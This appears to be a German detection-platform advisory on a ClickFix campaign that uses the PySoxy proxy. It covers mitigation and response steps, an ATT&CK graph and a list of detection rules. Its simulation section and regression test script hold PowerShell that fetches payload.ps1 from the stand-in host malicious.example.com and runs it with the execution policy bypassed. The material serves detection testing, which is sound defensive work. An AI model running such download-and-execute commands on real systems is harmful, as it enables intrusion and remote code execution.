Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
ClickFix ist eine auf Social Engineering basierende Lieferungstechnik, die jetzt mit dem Open-Source-SOCKS5-Proxy PySoxy kombiniert wird, um einen verschlüsselten sekundären Zugangskanal zu schaffen. Der Angriff beginnt, wenn ein Benutzer einen bösartigen PowerShell-Befehl ausführt, der eine geplante Aufgabe zur Persistenz einrichtet und eine im Speicher ausgeführte PowerShell-Kommandozentrale startet. Nach anfänglicher Aufklärung lädt der Angreifer PySoxy herunter und führt es aus, um einen zweiten verschlüsselten Pfad in die Umgebung zu etablieren. Diese modulare Nutzung von interpreterbasierten Tools macht sowohl die Erkennung als auch die Vorfallseindämmung schwieriger.
Untersuchung
ReliaQuest beobachtete einen einzigen benutzergesteuerten ClickFix-Befehl, der einen verschleierten PowerShell-Stager startete, eine geplante Aufgabe erstellte, eine Domänenaufklärung durchführte und später eine kompilierte Python-Bytecode-Datei namens b64.pyc, die mit python.exeausgeführt wurde. Die PowerShell-Komponente fungierte als leichter RAT, der alle drei Sekunden seinen Kommando- und Kontrollserver abfragte. Forscher sahen auch, dass der Angreifer curl verwendete, um Protokolle hochzuladen und die PySoxy-Nutzlast vom selben Staging-Server abzurufen.
Abschwächung
Verteidiger sollten verdächtige PowerShell-Starts erkennen und blockieren, die von explorer.exeausgehen, Überwachung geplanter Aufgaben, die versteckte PowerShell-Befehle ausführen, und nach Python-Ausführungen suchen, die proxybezogene Argumente wie -ssl, -remote_ip, und -remote_portverwenden. Sicherheitsteams sollten auch ausgehenden Datenverkehr zu den identifizierten Domänen und IP-Adressen überprüfen und alle persistierten PowerShell-Skripte oder .pyc Dateien entfernen, die in ProgramData.
Reaktion
Wenn verwandte Indikatoren gefunden werden, isolieren Sie den betroffenen Host sofort, deaktivieren Sie das kompromittierte Benutzerkonto, entfernen Sie die bösartige geplante Aufgabe, löschen Sie das PowerShell-Skript und PySoxy-Artefakte und scannen Sie das System nach zusätzlichen Überresten. Verteidiger sollten auch bestätigen, dass ausgehender Datenverkehr zur identifizierten Infrastruktur blockiert ist und verifizieren, dass keine anderen Persistenzmechanismen mehr aktiv sind.
"graph TB %% Klassendefinitionen classDef technique fill:#cce5ff %% Knotendefinitionen tech_content_injection["<b>Technik</b> – <b>T1659 Inhaltseinschleusung</b><br/><b>Beschreibung</b>: Gegner schleusen bösartige Inhalte in legitime Dateien oder Datenströme ein, um weitere bösartige Aktionen zu ermöglichen."] class tech_content_injection technique tech_user_exec_malicious_link["<b>Technik</b> – <b>T1204.001 Benutzerausführung: Bösartiger Link</b><br/><b>Beschreibung</b>: Opfer klickt auf einen manipulierten Link, der bösartigen Code ausführt."] class tech_user_exec_malicious_link technique tech_user_exec_psh_stager["<b>Technik</b> – <b>T1204 Benutzerausführung (PowerShell-Stager)</b><br/><b>Beschreibung</b>: Benutzer führt einen PowerShell-Befehl aus, der zusätzliche Nutzlasten stufenweise bereitstellt."] class tech_user_exec_psh_stager technique tech_obf_embedded_payloads["<b>Technik</b> – <b>T1027.009 Verschleierte Dateien oder Informationen: Eingebettete Nutzlasten</b><br/><b>Beschreibung</b>: Nutzlasten sind in anderen Dateien versteckt oder verschlüsselt, um die Erkennung zu umgehen."] class tech_obf_embedded_payloads technique tech_reflective_loading["<b>Technik</b> – <b>T1620 Reflexive Code Laden</b><br/><b>Beschreibung</b>: Bösartiger Code wird direkt in den Speicher geladen, indem reflektierende Techniken verwendet werden."] class tech_reflective_loading technique tech_scheduled_task["<b>Technik</b> – <b>T1053 Geplante Aufgabe/Job</b><br/><b>Beschreibung</b>: Eine geplante Aufgabe oder ein Job wird erstellt, um bösartigen Code zur Persistenz auszuführen."] class tech_scheduled_task technique tech_user_exec_psh_rat["<b>Technik</b> – <b>T1204 Benutzerausführung (im Arbeitsspeicher PowerShell RAT)</b><br/><b>Beschreibung</b>: Benutzer führt versehentlich ein PowerShell-basiertes Fernzugriffstool im Arbeitsspeicher aus."] class tech_user_exec_psh_rat technique tech_permission_groups["<b>Technik</b> – <b>T1069 Berechtigungsgruppenentdeckung</b><br/><b>Beschreibung</b>: Gegner zählt Berechtigungsgruppen und Mitgliedschaften im System auf."] class tech_permission_groups technique tech_lateral_tool_transfer["<b>Technik</b> – <b>T1570 Laterale Werkzeugübertragung</b><br/><b>Beschreibung</b>: Werkzeuge oder Dateien werden lateral zu einem anderen Host übertragen, z. B. über curl-Upload."] class tech_lateral_tool_transfer technique tech_multistage_channels["<b>Technik</b> – <b>T1104 Mehrstufige Kanäle</b><br/><b>Beschreibung</b>: Ein zusätzlicher Kommunikationskanal wird eingerichtet, um weitere Nutzlasten wie PySoxy herunterzuladen."] class tech_multistage_channels technique tech_proxy["<b>Technik</b> – <b>T1090 Proxy</b><br/><b>Beschreibung</b>: Verkehr wird über einen Proxy-Server geleitet, um den Ursprung zu verschleiern."] class tech_proxy technique tech_proxy_external["<b>Technik</b> – <b>T1090.002 Proxy: Externer Proxy</b><br/><b>Beschreibung</b>: Ein externer Proxy-Dienst wird genutzt, um Kommando- und Kontrollverkehr weiter zu verschleiern."] class tech_proxy_external technique tech_exfil_alt_proto["<b>Technik</b> – <b>T1048 Exfiltration über alternatives Protokoll</b><br/><b>Beschreibung</b>: Daten werden unter Verwendung eines Protokolls exfiltriert, das normalerweise nicht mit Datentransfers in Verbindung gebracht wird."] class tech_exfil_alt_proto technique %% Verbindungen, die den Angriffsverlauf zeigen tech_content_injection –>|führt_zu| tech_user_exec_malicious_link tech_user_exec_malicious_link –>|führt_zu| tech_user_exec_psh_stager tech_user_exec_psh_stager –>|führt_zu| tech_obf_embedded_payloads tech_obf_embedded_payloads –>|führt_zu| tech_reflective_loading tech_user_exec_psh_stager –>|ermöglicht| tech_scheduled_task tech_scheduled_task –>|führt_zu| tech_user_exec_psh_rat tech_user_exec_psh_rat –>|führt_zu| tech_permission_groups tech_permission_groups –>|führt_zu| tech_lateral_tool_transfer tech_lateral_tool_transfer –>|führt_zu| tech_multistage_channels tech_multistage_channels –>|führt_zu| tech_proxy tech_proxy –>|führt_zu| tech_proxy_external tech_proxy_external –>|führt_zu| tech_exfil_alt_proto "
Angriffsverlauf
Erkennungen
Mögliche Konto- oder Gruppenzählung / Manipulation (über cmdline)
Ansehen
Verdächtige Entdeckung von Domänenvertrauensstellungen (über cmdline)
Ansehen
Verdächtige CURL-Nutzung (über cmdline)
Ansehen
Verdächtige PowerShell-Strings (über powershell)
Ansehen
Verdächtige geplante Aufgabe (über Audit)
Ansehen
IOCs (SourceIP) zur Erkennung von: ClickFix entwickelt sich mit PySoxy-Proxying
Ansehen
IOCs (DestinationIP) zur Erkennung von: ClickFix entwickelt sich mit PySoxy-Proxying
Ansehen
Erkennung von PySoxy und ClickFix-Aktivität mit verdächtigen ausgehenden Verbindungen [Windows-Netzwerkverbindung]
Ansehen
Erkennung von ClickFix-PowerShell-C2-Aktivität [Windows-PowerShell]
Ansehen
ClickFix-Kampagne – Explorer startet verschleierte PowerShell [Windows-Prozesserstellung]
Ansehen
Simulation von Ausführungen
Voraussetzung: Der Telemetrie- und Basislinie-Vorabcheck muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die zur Auslösung der Erkennungsregel entworfen wurde. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffsbericht & Befehle:
- Ziel: Einen PowerShell-basierten C2-Kanal (ClickFix) einrichten, der eine bösartige Nutzlast von einem entfernten Server herunterlädt und sie heimlich ausführt.
- Methode: Der Angreifer startet
powershell.exemit den exakten Flags, die die Regel überwacht (-NoProfileand-ExecutionPolicy Bypass) und verwendetInvoke-WebRequest, um die Nutzlast abzurufen. - Warum diese Methode: Durch die Nutzung der nativen Windows PowerShell und des gängigen
Invoke-WebRequestCmdlet vermeidet der Angreifer das Herunterladen von Tools Dritter und reduziert so die Chance der Erkennung durch AV, während er das bekannte ClickFix-Verhalten erreicht, das in der Regel erfasst wurde.
# Schritt 1: Laden Sie das bösartige Script herunter (simuliert als harmloser Test) $url = "http://malicious.example.com/payload.ps1" $out = "$env:TEMPpayload.ps1" Invoke-WebRequest -Uri $url -OutFile $out # Schritt 2: Führen Sie das heruntergeladene Skript mit denselben Startparametern aus, die die Regel überwacht powershell.exe -NoProfile -ExecutionPolicy Bypass -File $out -
Regressionstestskript:
# ============================================== # ClickFix PowerShell C2-Simulation (TC-20260514-3G7ZK) # ============================================== # Variablen definieren $url = "http://malicious.example.com/payload.ps1" $out = "$env:TEMPpayload.ps1" # 1. Eine Dummy-Nutzlast herunterladen (fungiert als C2-Abruf) Write-Host "[*] Laden der Nutzlast..." try { Invoke-WebRequest -Uri $url -OutFile $out -UseBasicParsing } catch { Write-Error "Download fehlgeschlagen: $_" exit 1 } # 2. Führen Sie die Nutzlast mit den genau überwachten Flags aus Write-Host "[*] Ausführen der Nutzlast mit -NoProfile -ExecutionPolicy Bypass" powershell.exe -NoProfile -ExecutionPolicy Bypass -File $out Write-Host "[+] Simulation abgeschlossen." # ============================================== -
Bereinigungsbefehle:
# Entfernen Sie die temporäre Nutzlast-Datei if (Test-Path $out) { Remove-Item -Path $out -Force Write-Host "[*] Nutzlastdatei entfernt." } # Optional: Stoppen Sie alle verbleibenden PowerShell-Prozesse, die vom Test gestartet wurden Get-Process -Name "powershell" | Where-Object {$_.Path -like "*powershell.exe"} | Stop-Process -Force Write-Host "[*] Bereinigung abgeschlossen."